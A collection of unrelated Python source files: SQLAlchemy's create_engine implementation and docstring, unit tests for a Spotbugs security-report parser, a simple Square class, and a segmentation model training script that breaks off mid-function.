:param encoding: Defaults to ``utf-8``. This is the string
encoding used by SQLAlchemy for string encode/decode
operations which occur within SQLAlchemy, **outside of
the DBAPIs own encoding facilities.**
.. note:: The ``encoding`` parameter deals only with in-Python
encoding issues that were prevalent with many DBAPIs under Python
2. Under Python 3 it is mostly unused. For DBAPIs that require
client encoding configurations, such as those of MySQL and Oracle,
please consult specific :ref:`dialect documentation
<dialect_toplevel>` for details.
All modern DBAPIs that work in Python 3 necessarily feature direct
support for Python unicode strings. Under Python 2, this was not
always the case. For those scenarios where the DBAPI is detected as
not supporting a Python ``unicode`` object under Python 2, this
encoding is used to determine the source/destination encoding. It is
**not used** for those cases where the DBAPI handles unicode directly.
To properly configure a system to accommodate Python ``unicode``
objects, the DBAPI should be configured to handle unicode to the
greatest degree as is appropriate - see the notes on unicode pertaining
to the specific target database in use at :ref:`dialect_toplevel`.
Areas where string encoding may need to be accommodated
outside of the DBAPI, nearly always under **Python 2 only**,
include zero or more of:
* the values passed to bound parameters, corresponding to
the :class:`.Unicode` type or the :class:`.String` type
when ``convert_unicode`` is ``True``;
* the values returned in result set columns corresponding
to the :class:`.Unicode` type or the :class:`.String`
type when ``convert_unicode`` is ``True``;
* the string SQL statement passed to the DBAPI's
``cursor.execute()`` method;
* the string names of the keys in the bound parameter
dictionary passed to the DBAPI's ``cursor.execute()``
as well as ``cursor.setinputsizes()`` methods;
* the string column names retrieved from the DBAPI's
``cursor.description`` attribute.
When using Python 3, the DBAPI is required to support all of the above
values as Python ``unicode`` objects, which in Python 3 are just known
as ``str``. In Python 2, the DBAPI does not specify unicode behavior
at all, so SQLAlchemy must make decisions for each of the above values
on a per-DBAPI basis - implementations are completely inconsistent in
their behavior.
:param execution_options: Dictionary execution options which will
be applied to all connections. See
:meth:`~sqlalchemy.engine.Connection.execution_options`
:param future: Use the 2.0 style :class:`_future.Engine` and
:class:`_future.Connection` API.
.. versionadded:: 1.4
.. seealso::
:ref:`migration_20_toplevel`
:param hide_parameters: Boolean, when set to True, SQL statement parameters
will not be displayed in INFO logging nor will they be formatted into
the string representation of :class:`.StatementError` objects.
.. versionadded:: 1.3.8
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:param implicit_returning=True: When ``True``, a RETURNING-
compatible construct, if available, will be used to
fetch newly generated primary key values when a single row
INSERT statement is emitted with no existing returning()
clause. This applies to those backends which support RETURNING
or a compatible construct, including PostgreSQL, Firebird, Oracle,
Microsoft SQL Server. Set this to ``False`` to disable
the automatic usage of RETURNING.
:param isolation_level: this string parameter is interpreted by various
dialects in order to affect the transaction isolation level of the
database connection. The parameter essentially accepts some subset of
these string arguments: ``"SERIALIZABLE"``, ``"REPEATABLE READ"``,
``"READ COMMITTED"``, ``"READ UNCOMMITTED"`` and ``"AUTOCOMMIT"``.
Behavior here varies per backend, and
individual dialects should be consulted directly.
Note that the isolation level can also be set on a
per-:class:`_engine.Connection` basis as well, using the
:paramref:`.Connection.execution_options.isolation_level`
feature.
.. seealso::
:attr:`_engine.Connection.default_isolation_level`
- view default level
:paramref:`.Connection.execution_options.isolation_level`
- set per :class:`_engine.Connection` isolation level
:ref:`SQLite Transaction Isolation <sqlite_isolation_level>`
:ref:`PostgreSQL Transaction Isolation <postgresql_isolation_level>`
:ref:`MySQL Transaction Isolation <mysql_isolation_level>`
:ref:`session_transaction_isolation` - for the ORM
:param json_deserializer: for dialects that support the
:class:`_types.JSON`
datatype, this is a Python callable that will convert a JSON string
to a Python object. By default, the Python ``json.loads`` function is
used.
.. versionchanged:: 1.3.7 The SQLite dialect renamed this from
``_json_deserializer``.
:param json_serializer: for dialects that support the :class:`_types.JSON`
datatype, this is a Python callable that will render a given object
as JSON. By default, the Python ``json.dumps`` function is used.
.. versionchanged:: 1.3.7 The SQLite dialect renamed this from
``_json_serializer``.
:param label_length=None: optional integer value which limits
the size of dynamically generated column labels to that many
characters. If less than 6, labels are generated as
"_(counter)". If ``None``, the value of
``dialect.max_identifier_length``, which may be affected via the
:paramref:`_sa.create_engine.max_identifier_length` parameter,
is used instead. The value of
:paramref:`_sa.create_engine.label_length`
may not be larger than that of
:paramref:`_sa.create_engine.max_identfier_length`.
.. seealso::
:paramref:`_sa.create_engine.max_identifier_length`
:param listeners: A list of one or more
:class:`~sqlalchemy.interfaces.PoolListener` objects which will
receive connection pool events.
:param logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.engine" logger. Defaults to a hexstring of the
object's id.
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:paramref:`_engine.Connection.execution_options.logging_token`
:param max_identifier_length: integer; override the max_identifier_length
determined by the dialect. if ``None`` or zero, has no effect. This
is the database's configured maximum number of characters that may be
used in a SQL identifier such as a table name, column name, or label
name. All dialects determine this value automatically, however in the
case of a new database version for which this value has changed but
SQLAlchemy's dialect has not been adjusted, the value may be passed
here.
.. versionadded:: 1.3.9
.. seealso::
:paramref:`_sa.create_engine.label_length`
:param max_overflow=10: the number of connections to allow in
connection pool "overflow", that is connections that can be
opened above and beyond the pool_size setting, which defaults
to five. this is only used with :class:`~sqlalchemy.pool.QueuePool`.
:param module=None: reference to a Python module object (the module
itself, not its string name). Specifies an alternate DBAPI module to
be used by the engine's dialect. Each sub-dialect references a
specific DBAPI which will be imported before first connect. This
parameter causes the import to be bypassed, and the given module to
be used instead. Can be used for testing of DBAPIs as well as to
inject "mock" DBAPI implementations into the :class:`_engine.Engine`.
:param paramstyle=None: The `paramstyle <http://legacy.python.org/dev/peps/pep-0249/#paramstyle>`_
to use when rendering bound parameters. This style defaults to the
one recommended by the DBAPI itself, which is retrieved from the
``.paramstyle`` attribute of the DBAPI. However, most DBAPIs accept
more than one paramstyle, and in particular it may be desirable
to change a "named" paramstyle into a "positional" one, or vice versa.
When this attribute is passed, it should be one of the values
``"qmark"``, ``"numeric"``, ``"named"``, ``"format"`` or
``"pyformat"``, and should correspond to a parameter style known
to be supported by the DBAPI in use.
:param pool=None: an already-constructed instance of
:class:`~sqlalchemy.pool.Pool`, such as a
:class:`~sqlalchemy.pool.QueuePool` instance. If non-None, this
pool will be used directly as the underlying connection pool
for the engine, bypassing whatever connection parameters are
present in the URL argument. For information on constructing
connection pools manually, see :ref:`pooling_toplevel`.
:param poolclass=None: a :class:`~sqlalchemy.pool.Pool`
subclass, which will be used to create a connection pool
instance using the connection parameters given in the URL. Note
this differs from ``pool`` in that you don't actually
instantiate the pool in this case, you just indicate what type
of pool to be used.
:param pool_logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.pool" logger. Defaults to a hexstring of the object's
id.
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:param pool_pre_ping: boolean, if True will enable the connection pool
"pre-ping" feature that tests connections for liveness upon
each checkout.
.. versionadded:: 1.2
.. seealso::
:ref:`pool_disconnects_pessimistic`
:param pool_size=5: the number of connections to keep open
inside the connection pool. This used with
:class:`~sqlalchemy.pool.QueuePool` as
well as :class:`~sqlalchemy.pool.SingletonThreadPool`. With
:class:`~sqlalchemy.pool.QueuePool`, a ``pool_size`` setting
of 0 indicates no limit; to disable pooling, set ``poolclass`` to
:class:`~sqlalchemy.pool.NullPool` instead.
:param pool_recycle=-1: this setting causes the pool to recycle
connections after the given number of seconds has passed. It
defaults to -1, or no timeout. For example, setting to 3600
means connections will be recycled after one hour. Note that
MySQL in particular will disconnect automatically if no
activity is detected on a connection for eight hours (although
this is configurable with the MySQLDB connection itself and the
server configuration as well).
.. seealso::
:ref:`pool_setting_recycle`
:param pool_reset_on_return='rollback': set the
:paramref:`_pool.Pool.reset_on_return` parameter of the underlying
:class:`_pool.Pool` object, which can be set to the values
``"rollback"``, ``"commit"``, or ``None``.
.. seealso::
:paramref:`_pool.Pool.reset_on_return`
:param pool_timeout=30: number of seconds to wait before giving
up on getting a connection from the pool. This is only used
with :class:`~sqlalchemy.pool.QueuePool`. This can be a float but is
subject to the limitations of Python time functions which may not be
reliable in the tens of milliseconds.
.. note: don't use 30.0 above, it seems to break with the :param tag
:param pool_use_lifo=False: use LIFO (last-in-first-out) when retrieving
connections from :class:`.QueuePool` instead of FIFO
(first-in-first-out). Using LIFO, a server-side timeout scheme can
reduce the number of connections used during non- peak periods of
use. When planning for server-side timeouts, ensure that a recycle or
pre-ping strategy is in use to gracefully handle stale connections.
.. versionadded:: 1.3
.. seealso::
:ref:`pool_use_lifo`
:ref:`pool_disconnects`
:param plugins: string list of plugin names to load. See
:class:`.CreateEnginePlugin` for background.
.. versionadded:: 1.2.3
:param query_cache_size: size of the cache used to cache the SQL string
form of queries. Set to zero to disable caching.
The cache is pruned of its least recently used items when its size reaches
N * 1.5. Defaults to 500, meaning the cache will always store at least
500 SQL statements when filled, and will grow up to 750 items at which
point it is pruned back down to 500 by removing the 250 least recently
used items.
Caching is accomplished on a per-statement basis by generating a
cache key that represents the statement's structure, then generating
string SQL for the current dialect only if that key is not present
in the cache. All statements support caching, however some features
such as an INSERT with a large set of parameters will intentionally
bypass the cache. SQL logging will indicate statistics for each
statement whether or not it were pull from the cache.
.. note:: some ORM functions related to unit-of-work persistence as well
as some attribute loading strategies will make use of individual
per-mapper caches outside of the main cache.
.. seealso::
:ref:`sql_caching`
.. versionadded:: 1.4
""" # noqa
if "strategy" in kwargs:
strat = kwargs.pop("strategy")
if strat == "mock":
return create_mock_engine(url, **kwargs)
else:
raise exc.ArgumentError("unknown strategy: %r" % strat)
kwargs.pop("empty_in_strategy", None)
# create url.URL object
u = _url.make_url(url)
u, plugins, kwargs = u._instantiate_plugins(kwargs)
entrypoint = u._get_entrypoint()
dialect_cls = entrypoint.get_dialect_cls(u)
if kwargs.pop("_coerce_config", False):
def pop_kwarg(key, default=None):
value = kwargs.pop(key, default)
if key in dialect_cls.engine_config_types:
value = dialect_cls.engine_config_types[key](value)
return value
else:
pop_kwarg = kwargs.pop
dialect_args = {}
# consume dialect arguments from kwargs
for k in util.get_cls_kwargs(dialect_cls):
if k in kwargs:
dialect_args[k] = pop_kwarg(k)
dbapi = kwargs.pop("module", None)
if dbapi is None:
dbapi_args = {}
for k in util.get_func_kwargs(dialect_cls.dbapi):
if k in kwargs:
dbapi_args[k] = pop_kwarg(k)
dbapi = dialect_cls.dbapi(**dbapi_args)
dialect_args["dbapi"] = dbapi
dialect_args.setdefault("compiler_linting", compiler.NO_LINTING)
enable_from_linting = kwargs.pop("enable_from_linting", True)
if enable_from_linting:
dialect_args["compiler_linting"] ^= compiler.COLLECT_CARTESIAN_PRODUCTS
for plugin in plugins:
plugin.handle_dialect_kwargs(dialect_cls, dialect_args)
# create dialect
dialect = dialect_cls(**dialect_args)
# assemble connection arguments
(cargs, cparams) = dialect.create_connect_args(u)
cparams.update(pop_kwarg("connect_args", {}))
cargs = list(cargs) # allow mutability
# look for existing pool or create
pool = pop_kwarg("pool", None)
if pool is None:
def connect(connection_record=None):
if dialect._has_events:
for fn in dialect.dispatch.do_connect:
connection = fn(dialect, connection_record, cargs, cparams)
if connection is not None:
return connection
return dialect.connect(*cargs, **cparams)
creator = pop_kwarg("creator", connect)
poolclass = pop_kwarg("poolclass", None)
if poolclass is None:
poolclass = dialect.get_dialect_pool_class(u)
pool_args = {"dialect": dialect}
# consume pool arguments from kwargs, translating a few of
# the arguments
translate = {
"logging_name": "pool_logging_name",
"echo": "echo_pool",
"timeout": "pool_timeout",
"recycle": "pool_recycle",
"events": "pool_events",
"reset_on_return": "pool_reset_on_return",
"pre_ping": "pool_pre_ping",
"use_lifo": "pool_use_lifo",
}
for k in util.get_cls_kwargs(poolclass):
tk = translate.get(k, k)
if tk in kwargs:
pool_args[k] = pop_kwarg(tk)
for plugin in plugins:
plugin.handle_pool_kwargs(poolclass, pool_args)
pool = poolclass(creator, **pool_args)
else:
if isinstance(pool, poollib.dbapi_proxy._DBProxy):
pool = pool.get_pool(*cargs, **cparams)
pool._dialect = dialect
# create engine.
if pop_kwarg("future", False):
from sqlalchemy import future
default_engine_class = future.Engine
else:
default_engine_class = base.Engine
engineclass = kwargs.pop("_future_engine_class", default_engine_class)
engine_args = {}
for k in util.get_cls_kwargs(engineclass):
if k in kwargs:
engine_args[k] = pop_kwarg(k)
# internal flags used by the test suite for instrumenting / proxying
# engines with mocks etc.
_initialize = kwargs.pop("_initialize", True)
_wrap_do_on_connect = kwargs.pop("_wrap_do_on_connect", None)
# all kwargs should be consumed
if kwargs:
raise TypeError(
"Invalid argument(s) %s sent to create_engine(), "
"using configuration %s/%s/%s. Please check that the "
"keyword arguments are appropriate for this combination "
"of components."
% (
",".join("'%s'" % k for k in kwargs),
dialect.__class__.__name__,
pool.__class__.__name__,
engineclass.__name__,
)
)
engine = engineclass(pool, dialect, u, **engine_args)
if _initialize:
do_on_connect = dialect.on_connect_url(url)
if do_on_connect:
if _wrap_do_on_connect:
do_on_connect = _wrap_do_on_connect(do_on_connect)
def on_connect(dbapi_connection, connection_record):
do_on_connect(dbapi_connection)
event.listen(pool, "connect", on_connect)
def first_connect(dbapi_connection, connection_record):
c = base.Connection(
engine,
connection=dbapi_connection,
_has_events=False,
# reconnecting will be a reentrant condition, so if the
# connection goes away, Connection is then closed
_allow_revalidate=False,
)
c._execution_options = util.EMPTY_DICT
try:
dialect.initialize(c)
finally:
# note that "invalidated" and "closed" are mutually
# exclusive in 1.4 Connection.
if not c.invalidated and not c.closed:
# transaction is rolled back otherwise, tested by
# test/dialect/postgresql/test_dialect.py
# ::MiscBackendTest::test_initial_transaction_state
dialect.do_rollback(c.connection)
# previously, the "first_connect" event was used here, which was then
# scaled back if the "on_connect" handler were present. now,
# since "on_connect" is virtually always present, just use
# "connect" event with once_unless_exception in all cases so that
# the connection event flow is consistent in all cases.
event.listen(
pool, "connect", first_connect, _once_unless_exception=True
)
dialect_cls.engine_created(engine)
if entrypoint is not dialect_cls:
entrypoint.engine_created(engine)
for plugin in plugins:
plugin.engine_created(engine)
return engine
def engine_from_config(configuration, prefix="sqlalchemy.", **kwargs):
"""Create a new Engine instance using a configuration dictionary.
The dictionary is typically produced from a config file.
The keys of interest to ``engine_from_config()`` should be prefixed, e.g.
``sqlalchemy.url``, ``sqlalchemy.echo``, etc. The 'prefix' argument
indicates the prefix to be searched for. Each matching key (after the
prefix is stripped) is treated as though it were the corresponding keyword
argument to a :func:`_sa.create_engine` call.
The only required key is (assuming the default prefix) ``sqlalchemy.url``,
which provides the :ref:`database URL <database_urls>`.
A select set of keyword arguments will be "coerced" to their
expected type based on string values. The set of arguments
is extensible per-dialect using the ``engine_config_types`` accessor.
:param configuration: A dictionary (typically produced from a config file,
but this is not a requirement). Items whose keys start with the value
of 'prefix' will have that prefix stripped, and will then be passed to
:func:`_sa.create_engine`.
:param prefix: Prefix to match and then strip from keys
in 'configuration'.
:param kwargs: Each keyword argument to ``engine_from_config()`` itself
overrides the corresponding item taken from the 'configuration'
dictionary. Keyword arguments should *not* be prefixed.
"""
options = dict(
(key[len(prefix) :], configuration[key])
for key in configuration
if key.startswith(prefix)
)
options["_coerce_config"] = True
options.update(kwargs)
url = options.pop("url")
return create_engine(url, **options)
|
py | b4033c35c56e5a7d39d6c13eb703677125c28a96 | from django.test import TestCase
from dojo.tools.spotbugs.parser import SpotbugsParser
from dojo.models import Test
class TestSpotbugsParser(TestCase):
def test_no_findings(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/no_finding.xml", Test())
self.assertEqual(0, len(findings))
def test_parse_many_finding(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
self.assertEqual(81, len(findings))
def test_find_sast_source_line(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
self.assertEqual(95, test_finding.sast_source_line)
def test_find_sast_source_path(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
self.assertEqual("securitytest/command/IdentityFunctionCommandInjection.kt", test_finding.sast_source_file_path)
def test_find_source_line(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
self.assertEqual(95, test_finding.line)
def test_find_file_path(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
self.assertEqual("securitytest/command/IdentityFunctionCommandInjection.kt", test_finding.file_path)
def test_description(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
# Test if line 13 is correct
self.assertEqual(
"At IdentityFunctionCommandInjection.kt:[lines 20-170]",
test_finding.description.splitlines()[12]
)
def test_mitigation(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
# Test if line 10 is correct
self.assertEqual(
"#### Example",
test_finding.mitigation.splitlines()[9]
)
def test_references(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
# Test if line 2 is correct
self.assertEqual(
"[OWASP: Top 10 2013-A1-Injection](https://www.owasp.org/index.php/Top_10_2013-A1-Injection)",
test_finding.references.splitlines()[1]
)
|
py | b4033c915cb709007166e29d118e674fa4b16810 | #!/usr/bin/python3
"""Create and define the class "Square".
This module creates an class called "Square" that defines a square.
Typical usage example:
var = Square() or var = Square(arg)
"""
class Square:
"""Defines a Square.
Defines a square and its values subject to certain conditions.
Attributes:
__size: size of the square.
"""
def __init__(self, size=0):
"""Inits Square."""
self.__size = size
@property
def size(self):
"""Returns Square"""
return self.__size
@size.setter
def size(self, value):
"""Sets Square with a size subject to certain conditions."""
if type(value) is not int:
raise ValueError("size must be an integer")
if value < 0:
raise ValueError("size must be >= 0")
self.__size = value
def area(self):
"""Returns the current square area."""
return self.__size * self.__size
|
py | b4033c97ad8f3ea9bc04dbba4aecf204b7b4a0e1 | import argparse
from cmath import isnan
import datetime
import logging
import os
import random
import sys
sys.path.append(".")
import numpy as np
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.nn.functional as F
from datasets import voc5 as voc
from model.losses import MaskedDINOLoss, get_masked_cos_loss, get_seg_loss, DINOLoss
from model.model_aux_dino_roi import network
from omegaconf import OmegaConf
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data import DataLoader
from torch.utils.data.distributed import DistributedSampler
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
from utils import evaluate, imutils, optimizer
from utils.camutils import cam_to_label, cam_to_label2, cam_to_roi_mask, cam_to_roi_mask2, multi_scale_cam2, label_to_aff_mask
from utils.pyutils import AverageMeter, cal_eta, format_tabs, setup_logger, get_mask_by_radius
parser = argparse.ArgumentParser()
parser.add_argument("--config", default='configs/voc.yaml', type=str, help="config")
parser.add_argument("--work_dir", default=None, type=str, help="work_dir")
parser.add_argument("--local_rank", default=-1, type=int, help="local_rank")
parser.add_argument("--crop_size", default=224, type=int, help="crop_size")
parser.add_argument('--backend', default='nccl')
def worker_init_fn(worker_id):
worker_seed = torch.initial_seed() % 2**32
np.random.seed(worker_seed)
random.seed(worker_seed)
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
def crop_from_roi(images, roi_mask=None, crop_num=8, crop_size=96):
crops = []
b, c, h, w = images.shape
# images[:,0, ][roi_mask==2] = 0
# images[:,1, ][roi_mask==2] = 0
# images[:,2, ][roi_mask==2] = 0
rand_h = torch.randint(h - crop_size, size=(b, crop_num))
rand_w = torch.randint(w - crop_size, size=(b, crop_num))
crops_flag = torch.ones(size=(b, crop_num + 2), dtype=torch.int16)
temp_crops = torch.zeros(size=(b, c, crop_size, crop_size)).to(images.device)
for i2 in range(crop_num):
for i1 in range(b):
h0, w0 = rand_h[i1, i2], rand_w[i1, i2]
temp_crops[i1,...] = images[i1, :, h0:(h0+crop_size), w0:(w0+crop_size)]
crops_flag[i1, i2] = roi_mask[i1, h0:(h0+crop_size), w0:(w0+crop_size)].max()
crops.append(temp_crops)
return crops, crops_flag
def validate(model=None, data_loader=None, cfg=None):
preds, gts, cams, tscams, cams_aux = [], [], [], [], []
model.eval()
avg_meter = AverageMeter()
with torch.no_grad():
for _, data in tqdm(enumerate(data_loader), total=len(data_loader), ncols=100, ascii=" >="):
name, inputs, labels, cls_label = data
inputs = inputs.cuda()
b, c, h, w = inputs.shape
inputs = F.interpolate(inputs, size=[cfg.dataset.crop_size, cfg.dataset.crop_size], mode='bilinear', align_corners=False)
labels = labels.cuda()
cls_label = cls_label.cuda()
cls, segs, _, _, _ = model(inputs,)
cls_pred = (cls>0).type(torch.int16)
_f1 = evaluate.multilabel_score(cls_label.cpu().numpy()[0], cls_pred.cpu().numpy()[0])
avg_meter.add({"cls_score": _f1})
resized_segs = F.interpolate(segs, size=labels.shape[1:], mode='bilinear', align_corners=False)
###
_cams, _tscam, _cams_aux = multi_scale_cam2(model, inputs, cfg.cam.scales)
resized_cam = F.interpolate(_cams, size=labels.shape[1:], mode='bilinear', align_corners=False)
cam_label = cam_to_label(resized_cam, cls_label, cfg=cfg)
resized_cam_aux = F.interpolate(_cams_aux, size=labels.shape[1:], mode='bilinear', align_corners=False)
cam_label_aux = cam_to_label(resized_cam_aux, cls_label, cfg=cfg)
resized_tscam = F.interpolate(_tscam, size=labels.shape[1:], mode='bilinear', align_corners=False)
tscam_label = cam_to_label2(resized_tscam, cls_label, bkg_score=0.15, delta=0.1)
cls_pred = (cls > 0).type(torch.int16)
_f1 = evaluate.multilabel_score(cls_label.cpu().numpy()[0], cls_pred.cpu().numpy()[0])
avg_meter.add({"cls_score": _f1})
resized_segs = F.interpolate(segs, size=labels.shape[1:], mode='bilinear', align_corners=False)
preds += list(torch.argmax(resized_segs, dim=1).cpu().numpy().astype(np.int16))
cams += list(cam_label.cpu().numpy().astype(np.int16))
gts += list(labels.cpu().numpy().astype(np.int16))
cams_aux += list(cam_label_aux.cpu().numpy().astype(np.int16))
tscams += list(tscam_label.cpu().numpy().astype(np.int16))
valid_label = torch.nonzero(cls_label[0])[:, 0]
out_cam = torch.squeeze(resized_cam)[valid_label]
#np.save(os.path.join(cfg.work_dir.pred_dir, name[0]+'.npy'), {"keys":valid_label.cpu().numpy(), "cam":out_cam.cpu().numpy()})
cls_score = avg_meter.pop('cls_score')
seg_score = evaluate.scores(gts, preds)
cam_score = evaluate.scores(gts, cams)
cam_aux_score = evaluate.scores(gts, cams_aux)
tscam_score = evaluate.scores(gts, tscams)
model.train()
tab_results = format_tabs([cam_score, cam_aux_score, tscam_score, seg_score], name_list=["CAM", "aux_CAM", "TS-CAM", "Segs"], cat_list=voc.class_list)
return cls_score, tab_results
def train(cfg):
num_workers = 10
torch.cuda.set_device(args.local_rank)
dist.init_process_group(backend=args.backend, )
time0 = datetime.datetime.now()
time0 = time0.replace(microsecond=0)
train_dataset = voc.VOC12ClsDataset(
root_dir=cfg.dataset.root_dir,
name_list_dir=cfg.dataset.name_list_dir,
split=cfg.train.split,
stage='train',
aug=True,
resize_range=cfg.dataset.resize_range,
rescale_range=cfg.dataset.rescale_range,
crop_size=cfg.dataset.crop_size,
img_fliplr=True,
ignore_index=cfg.dataset.ignore_index,
num_classes=cfg.dataset.num_classes,
)
val_dataset = voc.VOC12SegDataset(
root_dir=cfg.dataset.root_dir,
name_list_dir=cfg.dataset.name_list_dir,
split=cfg.val.split,
stage='val',
aug=False,
ignore_index=cfg.dataset.ignore_index,
num_classes=cfg.dataset.num_classes,
)
train_sampler = DistributedSampler(train_dataset, shuffle=True)
train_loader = DataLoader(
train_dataset,
batch_size=cfg.train.samples_per_gpu,
#shuffle=True,
num_workers=num_workers,
pin_memory=False,
drop_last=True,
sampler=train_sampler,
prefetch_factor=4)
val_loader = DataLoader(val_dataset,
batch_size=1,
shuffle=False,
num_workers=num_workers,
pin_memory=False,
drop_last=False)
device = torch.device(args.local_rank)
model = network(
backbone=cfg.backbone.name,
num_classes=cfg.dataset.num_classes,
embedding_dim=256,
pretrained=cfg.backbone.pretrained,
pooling=cfg.backbone.pooling,
total_iters=cfg.train.cam_iters,
init_momentum=cfg.train.dino_momentum
)
param_groups = model.get_param_groups()
model.to(device)
if args.local_rank == 0:
writer = SummaryWriter(cfg.work_dir.tb_logger_dir)
optim = getattr(optimizer, cfg.optimizer.type)(
params=[
{
"params": param_groups[0],
"lr": cfg.optimizer.learning_rate,
"weight_decay": cfg.optimizer.weight_decay,
},
{
"params": param_groups[1],
"lr": cfg.optimizer.learning_rate,
"weight_decay": cfg.optimizer.weight_decay,
},
{
"params": param_groups[2],
"lr": cfg.optimizer.learning_rate * 10,
"weight_decay": cfg.optimizer.weight_decay,
},
{
"params": param_groups[3],
"lr": cfg.optimizer.learning_rate * 10,
"weight_decay": cfg.optimizer.weight_decay,
},
],
lr=cfg.optimizer.learning_rate,
weight_decay=cfg.optimizer.weight_decay,
betas=cfg.optimizer.betas,
warmup_iter=cfg.scheduler.warmup_iter,
max_iter=cfg.train.max_iters,
warmup_ratio=cfg.scheduler.warmup_ratio,
power=cfg.scheduler.power)
logging.info('\nOptimizer: \n%s' % optim)
model = DistributedDataParallel(model, device_ids=[args.local_rank], find_unused_parameters=True)
train_sampler.set_epoch(np.random.randint(cfg.train.max_iters))
train_loader_iter = iter(train_loader)
# loss_mask = get_mask_by_radius(h=cfg.dataset.crop_size, w=cfg.dataset.crop_size, radius=4)
avg_meter = AverageMeter()
# fake_iter_per_epoch = 800
# total_epochs = int(cfg.train.max_iters / fake_iter_per_epoch)
ncrops = 10
DINO_loss = MaskedDINOLoss(out_dim=1024, ncrops=ncrops,).cuda()
for n_iter in range(cfg.train.max_iters):
try:
img_name, inputs, cls_label, img_box, crops = next(train_loader_iter)
except:
train_sampler.set_epoch(np.random.randint(cfg.train.max_iters))
train_loader_iter = iter(train_loader)
img_name, inputs, cls_label, img_box, crops = next(train_loader_iter)
inputs = inputs.to(device, non_blocking=True)
cls_label = cls_label.to(device, non_blocking=True)
_, _, pre_cams = multi_scale_cam2(model, inputs=inputs, scales=cfg.cam.scales)
roi_mask = cam_to_roi_mask2(pre_cams.detach(), cls_label=cls_label, low_thre=cfg.cam.low_thre - 0.1, hig_thre=cfg.cam.high_thre + 0.1)
# roi_mask = cam_to_roi_mask(pre_cams.detach(), cls_label=cls_label, thre=cfg.cam.low_thre - 0.1)
local_crops, crops_flag = crop_from_roi(images=crops[2], roi_mask=roi_mask, crop_num=ncrops-2)
roi_crops = crops[:2] + local_crops
cls, segs, attns, fmap, cls_aux, out_t, out_s = model(inputs, crops=roi_crops, n_iter=n_iter)
cams, tscams, cams_aux = multi_scale_cam2(model, inputs=inputs, scales=cfg.cam.scales)
valid_cam, pseudo_label = cam_to_label(cams.detach(), cls_label=cls_label, img_box=img_box, ignore_mid=True, cfg=cfg)
valid_cam_aux, _ = cam_to_label(cams_aux.detach(), cls_label=cls_label, img_box=img_box, ignore_mid=True, cfg=cfg)
# roi_mask = cam_to_roi_mask(cams.detach(), cls_label=cls_label, thre=cfg.cam.low_thre)
# local_crops, crops_flag = crop_from_roi(images=inputs, roi_mask=roi_mask, crop_num=8)
segs = F.interpolate(segs, size=pseudo_label.shape[1:], mode='bilinear', align_corners=False)
seg_loss = get_seg_loss(segs, pseudo_label.type(torch.long), ignore_index=cfg.dataset.ignore_index)
cls_loss = F.multilabel_soft_margin_loss(cls, cls_label)
cls_loss_aux = F.multilabel_soft_margin_loss(cls_aux, cls_label)
di_loss = DINO_loss(out_s, out_t, crops_flag=crops_flag)
resized_cams_aux = F.interpolate(cams_aux, size=fmap.shape[2:], mode="bilinear", align_corners=False)
_, pseudo_label_aux = cam_to_label(resized_cams_aux.detach(), cls_label=cls_label, img_box=img_box, ignore_mid=True, cfg=cfg)
aff_mask = label_to_aff_mask(pseudo_label_aux)
cos_loss = get_masked_cos_loss(fmap, aff_mask)
# cos_loss = get_cos_loss(fmap, low_fmap)
loss = 1.0 * cls_loss + 0.0 * seg_loss + 1.0 * cls_loss_aux + 0.5 * cos_loss + 0.5 * di_loss
cls_pred = (cls > 0).type(torch.int16)
cls_score = evaluate.multilabel_score(cls_label.cpu().numpy()[0], cls_pred.cpu().numpy()[0])
avg_meter.add({'cls_loss': cls_loss.item(), 'cos_loss': cos_loss.item(), 'dino_loss': di_loss.item(), 'cls_loss_aux': cls_loss_aux.item(), 'cls_score': cls_score.item(),})
optim.zero_grad()
loss.backward()
optim.step()
if (n_iter + 1) % cfg.train.log_iters == 0:
delta, eta = cal_eta(time0, n_iter + 1, cfg.train.max_iters)
cur_lr = optim.param_groups[0]['lr']
preds = torch.argmax(segs, dim=1,).cpu().numpy().astype(np.int16)
gts = pseudo_label.cpu().numpy().astype(np.int16)
seg_mAcc = (preds == gts).sum() / preds.size
grid_imgs, grid_cam = imutils.tensorboard_image(imgs=inputs.clone(), cam=valid_cam)
_, grid_tscam = imutils.tensorboard_image(imgs=inputs.clone(), cam=tscams)
_, grid_cam_aux = imutils.tensorboard_image(imgs=inputs.clone(), cam=valid_cam_aux)
_attns_detach = [a.detach() for a in attns]
# grid_attns = imutils.tensorboard_attn2(attns=_attns_detach, n_row=cfg.train.samples_per_gpu, with_attn_pred=False)
grid_attn_cls_mhsa, grid_attn_cls_mean = imutils.tensorboard_cls_token_attn(_attns_detach)
grid_labels = imutils.tensorboard_label(labels=gts)
grid_preds = imutils.tensorboard_label(labels=preds)
if args.local_rank == 0:
